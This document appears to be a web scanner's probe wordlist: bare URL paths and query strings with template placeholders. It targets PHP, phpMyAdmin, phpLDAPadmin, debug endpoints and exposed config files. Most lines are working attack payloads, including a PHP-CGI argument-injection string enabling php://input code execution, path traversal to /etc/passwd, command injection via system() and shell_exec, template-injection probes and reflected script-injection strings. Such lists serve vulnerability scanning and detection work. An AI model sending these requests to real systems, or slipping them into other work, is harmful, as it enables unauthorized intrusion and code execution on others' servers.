/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/infusions/downloads/downloads.php?cat_id=${system(ls)}
{{paths}}

/_debugbar/open
/login.php/
/search?search_key=%7B%7B1337*1338%7D%7D
/arcade.php?act=Arcade&do=stats&comment=a&s_id=1
/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/phpldapadmin
/htdocs/index.php
/php-fpm.conf
/phpcs.xml
/.phpspec.yml
/phpspec.yml
/composer
/dashboard/
/graphql
/api/graphql
/query
/
/proxy
/psalm.xml
/phpmyadmin/libraries/advisory_rules_generic.php
/phpmyadmin/libraries/phpseclib/Crypt/AES.php
/phpmyadmin/libraries/phpseclib/Crypt/Rijndael.php
/login.php?secret=
/functions/scripts/find_full_subnets.php
/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date=
/{{paths}}/
{{filepath}}{{bakext}}
/.htdeployment
/.deployment
/.php_cs.cache
{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1
{{path}}/index.php?redirect=true&meth=ajax
/debug-kit
/.registry/pear.reg.ber
/.registry/pear.reg
/PEAR/.registry/pear.reg.ber
/PEAR/.registry/pear.reg
/prober.php
/symfony.lock
